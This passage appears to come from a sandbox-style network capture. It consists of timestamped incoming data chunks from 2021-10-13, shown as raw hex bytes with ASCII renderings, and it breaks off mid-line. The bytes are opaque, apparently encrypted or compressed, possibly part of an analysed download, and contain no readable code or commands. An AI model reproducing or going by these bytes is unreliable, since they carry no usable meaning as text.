Ascii: @6KG"RR:-?[;#o1-g+_f)D41RiM ,890S,K2^5JRS%q~'w.LC:A85qh>QaXm8x37nVi4N\|Yx}'Ipuj1K&hc'3c-GA2G& "],,h#
2021-10-13 13:52:05 UTC	556	IN	Data Raw: 4e f0 d9 ae c9 27 c8 00 0c 22 b7 fa 93 93 0f bb ac 3e c5 70 3b e4 14 f5 df 1f 54 d1 e1 2a f2 fe 26 20 02 23 41 2d ce c2 24 4e f8 8a be 98 c1 c7 27 8f c4 53 c4 bd 71 76 23 4a 85 9c 2f 5c 80 03 b1 7e de d4 3f 50 68 dc 43 30 25 2c ae 1a 7b 84 71 bb bf f0 bc 66 2d 3e 33 92 36 62 93 65 e6 70 c1 53 7d 6d fb 66 16 cf ad 74 ad f1 08 b5 bd f1 a1 69 af 61 a0 dc 2f 56 94 b0 cb c1 37 66 a2 12 54 1e a6 b6 df 9d 34 8a ee 75 29 8b b0 d9 e2 8e a3 e0 d6 54 59 0c f7 e0 41 1f 42 a6 dd a0 11 73 17 3c 1e 5d e3 39 a2 dc 79 a4 ef 84 3f 75 4a b5 d8 27 49 e2 05 44 0c fc d3 fd e9 fc d5 2b 7a 0a 9e 22 f7 8e 42 d8 70 0b 9a f6 b4 73 eb 2b 72 9b 18 6c 65 46 53 54 77 c3 df 94 7b d7 14 92 b5 32 2f 01 bb 8e cb e3 e2 fb ee 97 21 a9 37 f2 f1 a1 b7 6a b4 a2 ab ad 69 90 8d 50 d1 63 73 f4 50 Data Ascii: N'">p;T*& #A-$N'Sqv#J/\~?PhC0%,{qf->36bepS}mftia/V7fT4u)TYABs<]9y?uJ'ID+z"Bps+rleFSTw{2/!7jiPcsP
2021-10-13 13:52:05 UTC	557	IN	Data Raw: fa 18 c2 63 dd a7 69 83 44 91 27 66 1e fa c0 3e 3f 68 07 75 b3 b8 55 9f 1a 1d d1 d9 4e ea 30 94 d2 d2 00 fd dd 2a b3 66 ed d5 04 bc 06 99 aa fd 63 ab 59 21 a2 ac a6 03 20 ee 3c 23 81 4d ca 85 fb 7f 4a 5a 78 6f ac 28 ce b7 25 5e c2 da ec e6 c1 26 3a b5 a7 4f a6 34 00 b6 13 cf 0b 8b df bd e1 2f 15 6d d9 2c 28 df d5 af 3e c1 50 e4 33 55 b7 2d 6b b5 11 a4 1c 8e 81 7a 1b b2 3b aa 8b 36 39 22 fb e2 e1 a8 ca 32 17 b8 1b 4e 7c df 09 cc f4 d5 9d 68 d7 eb d9 d2 45 0d 4c 7f 78 b1 b2 1c 17 d2 b9 55 de 40 7d 8e 95 16 08 bd b8 a1 68 56 cc ff b3 1a 99 6a 9f 67 fb da 25 a3 f7 64 5e 67 ff 90 0c bd 9b af 87 e3 9a 67 b4 0c fe 93 88 01 6c 0d 10 77 d2 ea 52 65 e7 ff f2 b4 6a b4 f0 ff b7 02 e3 1f 24 31 c5 e8 3f ce 56 8d c8 11 ea bd b6 ca 94 c2 5f 49 2e 73 4a 54 a3 24 18 b9 da Data Ascii: ciD'f>?huUN0*fcY! <#MJZxo(%^&:O4/m,(>P3U-kz;69"2N\|hELxU@}hVjg%d^gglwRej$1?V_I.sJT$
2021-10-13 13:52:05 UTC	559	IN	Data Raw: c3 1c 09 a8 ed ae 96 55 a3 9e 9d 6d e9 d3 61 dc 7b a6 df 7e a2 e6 3b 0c f8 74 87 fe a2 82 f5 c4 97 89 6a 62 5b 79 e2 a6 b7 0c 62 80 0a 66 65 c5 dd 10 f4 c1 f0 c7 df ec 45 ef ea 6c 7b 07 d3 b7 89 8e ca b8 69 9e c6 0e 21 2d 21 17 df b5 90 af c4 09 f1 b9 62 a5 7f fe d6 b8 3b 41 40 36 3a 79 67 e9 3d ef 3d ba 55 60 f7 3d df fe 36 9b 3c fc b7 64 0d 4f af 76 1f 41 ad 0a 44 8e fc c6 e7 ca 6b aa 28 a9 be 15 d6 94 1d 6a f0 2e d8 84 88 7f 28 52 18 ab b7 96 c5 f8 f7 79 3b 1c 9d cf ed 42 be 17 02 53 d1 4c 69 28 09 00 92 f6 74 b1 d3 ad bb be 63 c2 e7 32 65 22 d8 70 b9 a6 9e 76 34 be 76 e9 74 60 b1 b0 40 3e ca f8 51 32 7a 98 03 8e 6d 68 e9 a2 4c e9 74 eb ca b6 b8 3d 1e fa 4f 64 43 e7 d1 8c db cd e0 7a e3 5c b0 81 4f c3 5a b3 7b b6 1c 3a d9 9b f8 f9 a4 fe 8c 85 f3 03 f7 Data Ascii: Uma{~;tjb[ybfeEl{i!-!b;A@6:yg==U`=6<dOvADk(j.(Ry;BSLi(tc2e"pv4vt`@>Q2zmhLt=OdCz\OZ{:
2021-10-13 13:52:05 UTC	560	IN	Data Raw: c8 68 fc f4 9d 66 0b cf b2 5e a7 e3 85 fc eb c5 b6 d2 c6 c8 61 d1 0e 17 91 9a 1e eb 42 6b ee 5d 38 1f 72 9f 31 8f a8 0d 98 5d 19 7e fb 02 68 14 38 f2 5a 18 d3 26 52 bb 15 9a f6 95 18 e6 2c e3 57 9a 30 d4 d5 bd 7b 30 73 73 43 61 d1 82 a0 78 5c ce e2 27 53 9a b6 3b fc ff f7 1a 92 72 b5 24 39 46 08 b3 35 eb cd c7 ec d0 a5 f0 9d 3b 79 3e 73 d9 cf ff f8 3c 98 2c 47 85 df 18 26 3b 60 ee bb a3 9e ce 45 eb 7e b7 6d 57 f6 53 73 ba ad b3 f6 58 2a db a2 3f ed a1 fa 90 3a 9b 06 59 45 e3 0d c9 14 24 f2 cf 4e a6 d9 8f ef d8 f1 8f 2e 9f 6a ce e4 28 dd 47 81 b0 d7 bf 9d 93 9b 01 78 46 6e ef e9 aa d7 eb ec b4 fa f8 55 9b 15 5a ba 4c c0 77 70 89 19 b2 f2 86 5d 64 16 55 c0 3a b5 24 36 59 18 79 b6 ff 7a df 63 dd 2c f4 03 f4 73 b4 9d 81 f3 4d c5 3c fc fd c0 fe 4f d7 a3 15 e0 Data Ascii: hf^aBk]8r1]~h8Z&R,W0{0ssCax\'S;r$9F5;y>s<,G&;`E~mWSsX*?:YE$N.j(GxFnUZLwp]dU:$6Yyzc,sM<O
2021-10-13 13:52:05 UTC	561	IN	Data Raw: ca 27 07 66 2d b4 cc de 7d f6 b3 78 4c 5c 06 3a 22 a6 1f 70 d7 5f 20 9c 0e de c8 c2 d8 c2 07 8f d6 a4 65 60 bd 05 d8 5a 7d 4f 69 55 11 e5 22 b1 b0 dc 8f 77 d7 b0 30 94 16 2d 27 22 70 0c dd 36 6c 7d 0d e7 45 c7 a5 78 4b 9e 19 7d 12 97 b7 f0 ff 17 5f 51 35 b9 24 db 89 20 d3 42 3f 07 13 a9 25 f8 83 8f 2f f9 99 52 d7 8c bc 2f 56 a9 e7 b5 da da a9 b1 71 fc 6a 54 bd 4d 4e 4a b3 ad 99 ad 17 e6 be b1 e1 4f 99 27 a9 6f bb 16 07 72 25 50 a1 b5 99 f6 84 62 b3 1e fa 3b d7 1b 73 dd 24 df 33 a6 e2 32 88 6c ec 3e b9 df c5 72 c8 7f ab a8 4a 49 0e 3b 09 8b 03 19 10 cd 5b e1 d9 7e 0d 61 b4 4b 76 52 db 9c 80 83 f2 ae e3 45 7f 4d 5c f5 c7 8c b5 d4 5b cf 97 16 b9 42 5d 79 7c ba 9e 5e da 08 3b 7f 16 fa 32 7b 6b ef 1c fb cc 82 1c d8 70 8a ec 4e 3e b9 fd 50 11 4d 51 db d0 6c b6 Data Ascii: 'f-}xL\:"p_ e`Z}OiU"w0-'"p6l}ExK}_Q5$ B?%/R/VqjTMNJO'or%Pb;s$32l>rJI;[~aKvREM\[B]y\|^;2{kpN>PMQl
2021-10-13 13:52:05 UTC	562	IN	Data Raw: 92 3d f7 88 7f 51 a8 b6 d7 05 d6 30 2b 78 ba 69 8d 8c 4a e6 79 a5 16 68 3c 65 57 bd 8c a3 4a 8e a5 68 3a c0 b5 1f 96 46 e9 d9 a1 6d a8 63 93 21 1b 75 d3 d8 0a 6f 2b 3e b0 e8 0a 0a da 5d 7d 6c 0d 9a 0d a1 d8 1a da 50 55 cb a0 32 4b f0 5d 62 89 25 f4 82 46 0b 0e d7 a4 f1 65 bf 0e 0f ae 08 0a f4 b4 02 ad d5 f7 c5 fe 5a 97 18 2d e4 f9 40 6f b0 bb 1e 0e 6d 5d 37 39 53 84 a2 37 fa b2 f1 44 e3 a3 fd 5b 92 c6 46 30 7c f8 54 01 38 a2 0b 8a 30 63 80 02 a1 3a d7 d9 00 7e ed ad 7d 87 e1 f2 3c 6d 92 aa ca 16 e3 c4 e7 d9 4b f3 72 97 25 20 b3 02 26 93 e2 49 7f eb 33 a9 5b 14 00 00 e5 4f a5 ba ad cf 88 49 d6 3f 0f 21 89 08 f6 c4 18 a8 17 f2 ee 29 49 c5 ca 9d 10 e0 e0 95 90 1a 40 10 81 a4 95 ad 1a 32 39 dd 3d 8c ff 1b 08 44 f5 c2 ad fc 9d 55 38 9d 5a 9c 1d a3 0e 8d be 5b Data Ascii: =Q0+xiJyh<eWJh:Fmc!uo+>]}lPU2K]b%FeZ-@om]79S7D[F0\|T80c:~}<mKr% &I3[OI?!)I@29=DU8Z[
2021-10-13 13:52:05 UTC	564	IN	Data Raw: e4 cc 9d 38 ab 55 af ee b2 8a 46 8e e6 c2 7d 82 4b bf 9e e7 7c 8f 5c a4 a7 ba df 29 46 d7 e9 7a 0a fe 75 b7 a7 da ed 1e c3 29 5f a7 0b 04 3c 49 2a be 5c 21 0c 1c 15 43 ae c2 10 11 17 03 d6 96 78 66 05 06 1f da 88 23 4b b1 df 9a 32 55 97 89 26 b1 ac 36 9b a2 33 d7 39 c4 32 98 67 e7 4a 24 7a 5b 9a 0d da e5 51 2a ce bc a1 4d d7 de c8 22 d6 b5 8a 16 77 02 97 03 9e 18 33 a2 12 ba 37 d9 c3 b3 fc 7c d5 d0 d0 d0 77 d9 1b f1 f6 24 9d a0 c0 6e e4 44 e8 f0 d5 66 a0 74 54 02 d7 54 31 bf f0 17 c1 65 17 6d fb b5 3a 34 25 b5 d4 51 47 f4 c4 ba c6 35 76 7c 4c 0a 79 fa 90 3b 8e f3 21 06 4b 49 61 e3 af 34 1b 0a af d0 54 f3 7e 85 95 f0 98 ed 08 e6 1a 54 ef d4 71 16 35 0a 50 ff 8b 28 47 46 af 49 49 5e 1c 6f c2 ff 91 1c 93 16 d3 cf 4d 38 c8 fa e4 f5 79 c6 e3 21 b4 08 0a 03 2a Data Ascii: 8UF}K\|\)Fzu)_<I\!Cxf#K2U&6392gJ$z[QM"w37\|w$nDftTT1em:4%QG5v\|Ly;!KIa4T~Tq5P(GFII^oM8y!*
2021-10-13 13:52:05 UTC	565	IN	Data Raw: 65 91 d2 a1 4c 33 00 9c b4 99 e1 9c e1 05 3b 08 75 4f 39 47 65 7a 6b 8f 9f 89 9d da 7a 87 27 cf f1 57 68 8e 97 55 47 c1 a2 42 76 41 cf 37 a6 8e fa 97 f5 05 2c 31 1e fb 30 23 0d bd 34 54 b0 0f 57 08 05 3e 64 bc 60 ac 33 7a 4f e2 41 94 c5 75 0b 83 ec 93 8c a3 02 47 b8 54 46 b8 f6 26 8f a9 4d 15 e5 21 c0 7a 3d d1 3e dc 12 d4 f9 cc 4f dc d2 e2 12 2a c2 7a 3f 5f 8f d2 ab 64 49 14 52 5d be 27 84 b8 d6 98 9e ca d8 32 52 bb a5 04 fd 0f 49 c5 51 77 a7 c9 ee 8d 1a e5 18 c5 f4 bf c4 f3 55 e8 19 b8 5c 1d d2 fa 62 a6 99 53 b5 06 06 2f 80 a4 b4 99 f6 57 64 be be c6 93 b5 56 4e 2b 74 37 2d e6 6e bf 9a 94 12 c1 e8 34 c9 17 4b 7c ab 07 2f 10 04 6a e1 e8 6d 95 85 c2 f0 e6 74 99 48 c3 0c 18 d7 ba e1 29 fe 0e f4 68 28 3f 40 5f 15 2e 62 84 15 3c 91 75 ca 16 32 0f 62 34 a3 6b Data Ascii: eL3;uO9Gezkz'WhUGBvA7,10#4TW>d`3zOAuGTF&M!z=>O*z?_dIR]'2RIQwU\bS/WdVN+t7-n4K\|/jmtH)h(?@_.b<u2b4k
2021-10-13 13:52:05 UTC	566	IN	Data Raw: 84 06 e4 96 e5 be b9 15 2a 3b 55 29 85 8d d7 95 63 ae 7c 07 90 17 87 19 5d 4a 9b 72 38 2f 94 5a 52 d2 78 ad 10 04 a1 ec 4c 51 25 a3 df b1 7a 5a ed a7 44 e0 cc 84 fb e9 a2 e3 cc 20 cc 25 f4 4d b2 1e fa df 4d 0e cc 3a ce 2a 46 e0 7a 6e 71 ff ae b8 81 a7 34 7b b6 8e 0b ad a8 7f bb 5d 7d 8c 85 65 43 db 05 70 2e 26 33 7f 12 4f cb 51 53 5b 55 a1 38 74 17 51 d8 1d 91 c9 15 d8 de 6f 16 b0 96 fb cd c3 cb 22 0d cb 6c 01 bd ab 47 16 fd fc 0b cb d7 8f 22 8b 45 66 e5 dc 2b 9c cf 79 7d 9c d0 34 a0 3b a0 50 16 c9 bf 2d 0e 24 ee 61 2e 54 c9 9c 38 ca cc 4e 6e ff 94 63 36 c0 91 39 df 65 7b 41 5a ea ad d4 a6 25 56 59 fe ce fd ad b0 fb 8e 9b fa 24 2b db 65 fd 12 28 97 8b 91 45 a7 90 53 38 92 36 c1 c4 5a 4b 1a 32 0d bd b3 aa fb c4 86 1b a3 c1 88 c8 d2 e6 0b 4f 11 68 ed bd 7d Data Ascii: ;U)c\|]Jr8/ZRxLQ%zZD %MM:Fznq4{]}eCp.&3OQS[U8tQo"lG"Ef+y}4;P-$a.T8Nnc69e{AZ%VY$+e(ES86ZK2Oh}
2021-10-13 13:52:05 UTC	567	IN	Data Raw: 4f 02 85 ae 5c bb c9 f7 22 21 f3 14 f0 8e 35 63 cd d3 89 ad 5b e5 89 12 ac 6b 11 46 79 65 b5 eb 22 9b e3 d6 46 46 ff f1 a0 4a 68 85 4a fb 05 5c 9d 9f 23 a5 db 4a 25 71 a1 84 67 4f 08 55 c4 1a 62 02 79 f8 e8 f6 48 b2 34 20 80 c2 6c 84 fc 0d de 64 a5 a8 97 79 be a8 30 cd 3c c6 f4 e9 89 f1 53 cf 60 88 17 72 60 0a 6e 18 56 b3 6c a6 2d 42 0d 72 4a 70 1a cb 82 4a d7 1c f8 c5 72 11 4b 5c 33 35 7b 41 d9 dc e4 01 05 e4 91 d8 66 0f 13 de 38 87 de a1 82 f5 e2 5e 8c d2 2e 5b 55 e1 a6 b7 71 22 c1 34 d4 29 15 08 b1 86 36 f3 78 60 fd f7 bd 9b a5 7b 07 7e 6b 0b 51 fd 7f 6f 6e 35 99 87 71 20 bc 8e 72 7f 97 53 14 14 cb 54 0d ee d8 53 84 47 7a bb 26 f9 ff 3b 78 50 eb 45 45 aa a3 33 28 58 f9 c7 d6 48 14 c5 2a f1 1b fb 4e 4a 56 0c 4d ba 89 f4 cf b6 86 0b bb 14 06 10 ed 10 66 Data Ascii: O\"!5c[kFye"FFJhJ\#J%qgOUbyH4 ldy0<S`r`nVl-BrJpJrK\35{Af8^.[Uq"4)6x`{~kQon5q rSTSGz&;xPEE3(XH*NJVMf
2021-10-13 13:52:05 UTC	568	IN	Data Raw: 7e 63 ce 89 c8 a0 3b e3 ce 1f 97 bc d6 80 ba 40 92 59 81 d9 44 82 04 0a 95 1e e8 19 4f 46 a8 29 fa 74 0c 22 91 69 89 25 46 1e bc d2 0e 34 62 87 96 57 c1 ec 81 75 f3 20 08 14 0c 99 92 b0 0f 51 f4 a5 37 9c 29 60 0b 38 c7 ba f5 fa 7b 69 2f cf b4 5a 85 49 83 fb e2 24 8d 4f d3 ea ff be 5a f4 d7 72 6f 34 41 1b 61 ef 16 92 90 06 47 df c1 1c 1e 37 4e d9 97 7c 83 37 e2 e7 f1 22 27 94 3c f6 d2 2a e3 79 2a 49 84 dd 12 45 c8 14 58 d9 51 cd 10 77 ea 9a 1e f2 a0 99 bc 7c 5c 25 7b dc b4 94 c0 b4 98 a5 1a 90 9b f4 ac c2 64 d4 37 71 5a 04 85 65 98 64 dd 8f a2 93 96 4e 72 57 52 84 1b 3c c9 45 fc e6 40 0d 35 6f 99 0a 5b b1 3b 14 90 2f 31 a0 91 f3 a2 5c ff 38 46 a6 15 89 b2 c2 4b 31 a7 07 84 8e ee 36 6b fa 4e 4b 06 7b bf 66 2d ba e9 5a 0c 47 2d 5c 6a 44 29 4d 0b 65 91 37 73 Data Ascii: ~c;@YDOF)t"i%F4bWu Q7)`8{i/ZI$OZro4AaG7N\|7"'<yIEXQw\|\%{d7qZedNrWR<E@5o[;/1\8FK16kNK{f-ZG-\jD)Me7s
2021-10-13 13:52:05 UTC	570	IN	Data Raw: bb ba 26 9c bb 6b 67 73 6b ab be e1 32 c8 f1 52 8a 2d cf 60 94 70 38 c0 ce 78 b1 3a 36 08 8a b2 2f 09 8b 62 53 4c a9 ef 80 44 c9 de a7 4b 80 5c 6d 59 e1 f1 f9 ed aa 2e 0e 17 65 cd 9a 08 fe 3d 2e b9 f3 f9 b7 41 89 7f fc db 9d 77 c5 06 5f 07 c4 13 0a ec cf d0 95 04 16 37 8e 9a db 89 ea 99 f3 31 e1 05 33 89 29 9c 76 cd fa b5 1f 85 76 71 f4 ae 2f 53 37 b2 f9 49 e3 61 d5 fe 31 7b 95 6a dd 06 0c 43 3c 8b 13 67 a6 56 2f 0b 4f c7 d8 4f 88 55 68 aa 74 17 b6 1c af e4 73 52 60 c2 9e 7a 4f e2 92 38 99 23 e3 b6 5e 93 e6 28 1d ec 01 3d d3 e3 2e a5 4b 6e 58 5b 30 0d a8 3d c6 a5 68 90 93 f8 7d 44 c7 35 af 94 16 0f 85 19 8b 06 85 d2 28 f2 03 79 51 ea 65 5b 7a 74 de b3 de 12 2e 63 0f 0c 3f 50 2b 50 30 2e c8 41 99 b5 2e 02 db cf 4e 89 9e e6 64 7b 56 e9 19 ee d7 33 85 27 57 Data Ascii: &kgsk2R-`p8x:6/bSLDK\mY.e=.Aw_713)vvq/S7Ia1{jC<gV/OOUhtsR`zO8#^(=.KnX[0=h}D5(yQe[zt.c?P+P0.A.Nd{V3'W
2021-10-13 13:52:05 UTC	571	IN	Data Raw: 52 a3 c0 7f ed 20 44 29 a8 ec af 9d c1 26 02 60 fd 2b 82 f2 b9 38 ba 53 d0 28 2f a4 87 b0 05 40 09 cb 87 71 55 c5 c1 7d 97 bc 34 24 5f 82 8b e4 c8 7f 78 3c 6b dd 97 73 1a 29 54 8f 0b 32 66 b0 2e dd 64 8b a3 d1 f2 f3 a1 e3 c8 0e 90 98 70 db 4b a9 d2 57 f4 b3 2c 04 b0 2a 87 42 b7 f3 aa 51 48 6e f4 f2 c2 ae 04 00 2d bc a6 f1 38 48 01 b1 ff 9f d1 a2 f8 91 c6 85 87 e1 44 39 ba c2 b6 d7 9d cd cf b6 ae 22 b8 11 9b 44 1b 35 0c 3f 4a 3d 42 b4 6e c9 5e 85 96 e6 6a d7 3c e4 fa 1d 1a c2 1f 69 eb ab 65 94 21 1b 73 38 c0 be 5d a6 11 0c ef 5b a6 00 5d 7d 5d d7 81 21 c6 58 21 ae 9e 9d 5c c9 e2 cf b1 f3 5b 02 58 6b 58 68 e7 7e 61 53 85 a3 e9 e4 ba f8 2c 00 78 b4 78 bf e3 24 37 f0 de 15 72 29 69 fc cd a9 3b f6 5f 08 cb a3 df 06 53 84 96 56 8d ac 7a 39 ac a8 78 a3 c2 45 29 Data Ascii: R D)&`+8S(/@qU}4$_x<ks)T2f.dpKW,*BQHn-8HD9"D5?J=Bn^j<ie!s8][]}]!X!\[XkXh~aS,xx$7r)i;_SVz9xE)
2021-10-13 13:52:05 UTC	572	IN	Data Raw: b1 72 3e 42 78 db 7d e1 13 28 97 88 2f 34 a6 43 ac 4a 8b f6 dd c5 5a 4b c9 1e ed 37 5b e3 bc 98 86 96 26 47 76 ba ba 5a 4f 32 e0 0e 64 b2 fc aa bd 6d cc d2 d9 7d 3f f9 09 95 b1 6a 21 c2 10 40 83 94 73 0e b7 6e 67 d8 61 eb 09 f0 58 83 71 d0 8b c0 bf 35 73 f7 1e 35 1c c1 6e 33 fc 16 bf 88 fd 5e 28 ba cc 58 12 0c 94 d0 b8 43 12 7a b0 ef 9f b2 43 f1 e8 83 fb 07 b5 8c b3 2c 46 45 2e 67 03 33 18 6f dd 86 58 68 bf 62 41 6f f9 94 c1 dc bc 22 a2 11 d9 8d 90 d5 c8 1d 5f c4 12 ed 76 4e 4d 5f a5 b3 08 58 4e 28 ca 53 f3 9b fc 83 50 51 cd 43 f9 28 d6 5b f2 d1 32 43 f3 8b a8 01 0f 41 c4 28 42 2f 4d 53 c8 17 b1 2f fa d3 ec e1 83 1b 43 72 9a 67 e7 19 f4 ac d5 c1 c0 57 a8 28 bb 31 f2 af a6 cf 85 41 67 3e 4c f3 84 a4 6b c4 9f ce 5a 33 f2 1c 33 27 0d 55 2f 5c 1e 67 23 39 54 Data Ascii: r>Bx}(/4CJZK7[&GvZO2dm}?j!@sngaXq5s5n3^(XCzC,FE.g3oXhbAo"_vNM_XN(SPQC([2CA(B/MS/CrgW(1Ag>LkZ33'U/\g#9T
2021-10-13 13:52:05 UTC	573	IN	Data Raw: 6c 51 0a bf 76 f9 fd 0b ab 78 d7 89 c8 ef d0 a7 b1 90 95 e2 b5 c3 55 a0 09 b3 4a a9 32 5e 19 d7 35 cf ae 7f 8a 11 67 ee 8c d7 3c 41 93 8f 75 41 c7 75 2e 71 bc 32 9c 39 43 0a 6c f5 87 c2 05 08 6a 2f e1 58 bc 68 1a c2 2c e1 cf 84 a9 78 b9 64 aa db 09 8b 72 57 e5 a5 f2 03 ff db 77 0d 84 70 b8 69 9f 9f 46 65 2e bb 76 d1 2a 1a 9b 46 ba 39 51 25 66 50 30 29 c4 ad f8 46 37 bb 9d 04 0b a7 8d 3d 4d e1 05 77 08 91 c8 fd 4b 5e 51 16 31 1c 71 1d 6a 6f 81 1f b2 83 7a 23 55 60 4d e5 fd aa cf 8f 2d 81 16 4f 57 dd 6f 2b 13 8b 31 25 b9 89 48 37 99 80 d7 74 9c 89 a1 ab 3b bd 12 60 db 54 7a 4f ea c0 bc a6 e3 66 19 3b 0b 4c 77 11 f3 ca 47 5a 68 cb 7b 4c e8 ec 92 d3 b0 57 ad 47 49 b8 1b 15 5c 22 cf 9a 53 f8 cd e9 6c 12 ca 76 74 01 17 ab 36 1f aa e0 a0 cc 95 85 2b 8f a1 49 d4 Data Ascii: lQvxUJ2^5g<AuAu.q29Clj/Xh,xdrWwpiFe.v*F9Q%fP0)F7=MwK^Q1qjoz#U`M-OWo+1%H7t;`TzOf;LwGZh{LWGI\"Slvt6+I
2021-10-13 13:52:05 UTC	575	IN	Data Raw: 8e 52 6c 81 d0 5c 76 c0 8a 37 c7 57 5f cd de 54 fc 00 86 8e 92 a1 1a b8 cb b8 82 f0 bf 66 c5 9e 62 52 5c 9a 98 fd 23 80 2d 43 5b 28 0b cb 01 e7 29 20 55 24 33 fc c4 bb 16 e4 df 2c d6 e8 21 01 b9 c6 c7 6d 58 3f a0 ac 2a 5e 50 48 5c da f8 05 2a cb 2a b8 a0 fc 09 31 a5 1f fe ab 64 87 81 ec c2 d4 d1 e1 7d 5c 66 cb 7a 51 1e 5d e3 3f a2 a4 40 5b 10 5f 9b f4 b1 1b aa e4 51 f4 0d 44 a1 fc d3 15 c3 03 2a 2b 7a 0e 45 a4 41 4d 3a 5b 5c 75 48 2a 15 ed 2f 7d 31 6c 29 87 60 9a 57 f3 98 b6 d7 49 63 17 2f 7d cf 47 9f 3c b4 0b aa 6d f4 b2 7c 4c 59 f6 cb 0d 0e 99 7b b4 7c 4b e8 ad 38 9e d9 14 63 62 2d fb 10 e1 3b ae d1 c8 a3 a0 59 84 cf 7c ab 87 1a 28 64 5c d3 3f 2d e0 a5 de d2 d9 51 7b ba a3 bd c8 d4 5e 02 58 33 89 7a f0 78 60 27 bc 76 34 03 0f 1d 71 40 e2 e3 45 7e ec aa Data Ascii: Rl\v7W_TfbR\#-C[() U$3,!mX?^PH\1d}\fzQ]?@[_QD+zEAM:[\uH*/}1l)`WIc/}G<m\|LY{\|K8cb-;Y\|(d\?-Q{^X3zx`'v4q@E~
2021-10-13 13:52:05 UTC	576	IN	Data Raw: 28 48 07 fc 85 1a 53 d9 07 7c 5d b9 dc 91 5c 53 07 79 27 d3 d5 96 10 5a d5 2d 4f 42 2e 02 d1 c1 69 4e 17 ba dc 7b 56 e8 9a 90 ff 68 d5 fd 36 56 90 53 36 78 5f 25 37 21 54 99 f6 09 6c 25 d3 05 cb 02 40 26 2d 76 b4 53 82 e3 3d 64 a4 ed 3e b9 38 7f 1f b6 ad ab 07 38 6e f6 3a 27 07 3f e7 ef bf 0e f1 68 35 48 91 69 91 09 45 1e bc ea 85 20 82 62 12 bf 35 98 eb a6 8f 1b c3 c3 41 c9 0a 61 e7 b4 34 d7 45 1f 11 83 71 a9 20 c3 9e fa 7b 6a 87 b4 6e ec f9 28 83 91 6f e1 de 5b f6 76 ad ee 31 c7 27 fb 29 f3 00 cb 4a 25 9c d7 9c 83 d9 20 21 c8 9b 59 a8 53 d5 3a 7b e8 1d b7 a7 a0 e5 fb 86 a5 0f 2a ad cd 84 71 d3 07 ac a2 c8 fc 1a 40 51 cd 9d 8e 03 4e 5b f2 0f 8e 9f 39 d9 25 84 e3 1b 49 bf e1 77 a5 1a 4e 45 59 70 fb 9b 2b 30 aa f7 af 22 cd 8f 96 15 af 27 05 ce 23 fd 6d ad Data Ascii: (HS\|]\Sy'Z-OB.iN{Vh6VS6x_%7!Tl%@&-vS=d>88n:'?h5HiE b5Aa4Eq {jn(o[v1')J% !YS:{*q@QN[9%IwNEYp+0"'#m
2021-10-13 13:52:05 UTC	577	IN	Data Raw: 02 23 6f 5c 0f 76 58 88 bc b8 95 80 13 aa 39 a1 8f 98 8d f5 1e 8d ea c5 68 a0 e6 06 c9 e5 3f ba 97 a4 4f 3b e3 8b 85 c6 77 78 50 cc 03 45 aa a3 33 34 82 67 e8 54 26 5e 8b 0d 36 c7 24 b4 67 f6 ad a6 ea 01 69 cb 10 f2 11 0e 33 97 41 1e 51 1c 77 52 8a 81 4d 5b fa e5 3c be f5 93 60 92 6c ef 46 a6 d0 f6 00 8d 64 e7 be 17 7e 80 d5 6e ea e0 08 f8 6c 09 8b 78 16 b5 06 86 19 9b 86 19 9d 62 c2 1f bc ea 95 6a c0 41 89 9e 58 f2 14 13 3a a9 ca 57 ff 45 b0 b2 ec b6 17 87 d2 4d 38 5a 2a c7 e2 71 b6 4f 6a 8b c4 46 69 cc 97 49 0e e8 92 10 78 8e 61 51 2d 52 37 ac 4d b6 1c 88 2f bc 33 c6 72 b9 88 75 88 6c b6 05 b7 e0 e3 d2 f4 ec 13 50 27 e1 54 28 6c 2a 8b e8 8c d6 7c 09 c9 15 77 02 b0 2a 19 81 8e 3b 95 23 68 6b 6c 6e 73 d7 c4 2e b5 ff 51 1c 7f 74 67 f5 8d 19 66 ce 24 2b c2 Data Ascii: #o\vX9h?O;wxPE34gT&^6$gi3AQwRM[<`lFd~nlxbjAX:WEM8ZqOjFiIxaQ-R7M/3rulP'T(l\|w*;#hklns.Qtgf$+
2021-10-13 13:52:05 UTC	578	IN	Data Raw: 29 72 f0 67 b1 48 47 a8 4c 99 cb dc ff b9 28 ba 65 af dc 0f d3 1f df 3f 38 cf e2 7c d8 21 b6 3b 5a 33 2f d4 ba 7f 0a eb a9 79 f7 98 57 b5 1b 48 d1 20 9a 7b 1b 6d a4 19 97 d3 5b 82 f0 3c a2 0d 6e f2 61 9c 4a 4e 08 fd 87 e5 9b 44 81 7a da 6e 18 a0 75 fe 24 9b 32 45 21 58 e3 4c 67 a4 ed f1 77 27 d8 c3 07 71 03 c5 83 f9 1f a2 bd 19 5b 0e 8e a0 76 d1 69 05 c4 3f a0 08 e2 29 43 6d cf f4 e0 c2 d4 d5 0e 8a 42 5d 10 17 5d 5d a2 1c e4 17 f3 0d 9f 14 5f 5b b3 db 42 27 71 f0 5a 1a 53 4a 55 c4 7b c8 80 ee b8 3d 21 f2 b8 71 f4 6b 69 3b 75 fb 3c a7 81 c3 95 a4 57 93 a4 30 44 fa df 75 f3 36 4b d6 71 62 28 a3 38 ae e8 59 c7 fb 11 34 e3 de 06 8c ce a1 79 7a bb 31 79 e4 1b 8d cc 05 75 8e 19 dd 0f 2d 20 d6 9f 92 bb 44 a9 c4 9b 2f 3e 86 31 f6 cc bc d4 38 d8 f1 c8 a3 2e cf c8 Data Ascii: )rgHGL(e?8\|!;Z3/yWH {m[<naJNDznu$2E!XLgw'q[vi?)CmB]]]_[B'qZSJU{=!qki;u<W0Du6Kqb(8Y4yz1yu- D/>18.
2021-10-13 13:52:05 UTC	580	IN	Data Raw: 02 f9 b3 c6 3c 31 22 32 92 33 19 57 04 3e f7 b5 97 25 34 39 44 c7 0e 47 f8 a8 5f d2 7a 2a 27 8e d2 ab b5 db ec 0f 5e 35 ce 61 ff e6 c7 b5 81 de 59 67 30 27 d3 07 b8 d8 6c 64 a9 b1 c1 ea 0a d1 c2 b9 4e 6c 6c a3 2d 46 65 9f 86 9f 68 da 29 23 84 13 97 b1 83 b3 50 27 28 f1 29 a6 82 aa 57 6e 48 54 d7 1b 73 c1 24 61 7d e5 0b f1 1a 97 12 b5 f7 4a c3 56 2b 7f 85 73 92 14 a4 82 13 3b 13 18 9b 0d 1e 94 cf b2 4a 12 20 18 43 39 d9 43 09 c6 61 65 52 2b 41 ca ea 21 d4 43 24 67 1a 29 cb d5 fe c3 04 7f c4 3b 70 e5 9e f4 69 7c 74 d2 ac 2c 59 3d f5 5d 55 98 93 0a be ba 38 c8 6a a5 50 70 88 3b 46 d2 fa 2a 54 d7 86 bb b9 